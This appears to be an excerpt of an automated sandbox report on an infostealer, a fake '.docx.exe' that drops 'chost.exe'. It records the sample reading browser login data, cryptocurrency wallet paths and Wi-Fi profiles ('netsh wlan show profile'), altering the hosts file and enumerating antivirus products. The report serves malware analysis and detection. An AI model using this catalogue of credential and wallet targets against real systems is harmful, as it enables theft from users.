                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\BPMLNOBVSB.png VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformationJump to behavior
                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_00007FF69436D080
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF694385EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,16_2_00007FF694385EEC
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040559A GetVersionExW,GetVersionExW,0_2_0040559A
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
                    Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 4336, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.key, type: DROPPED
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E184EC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
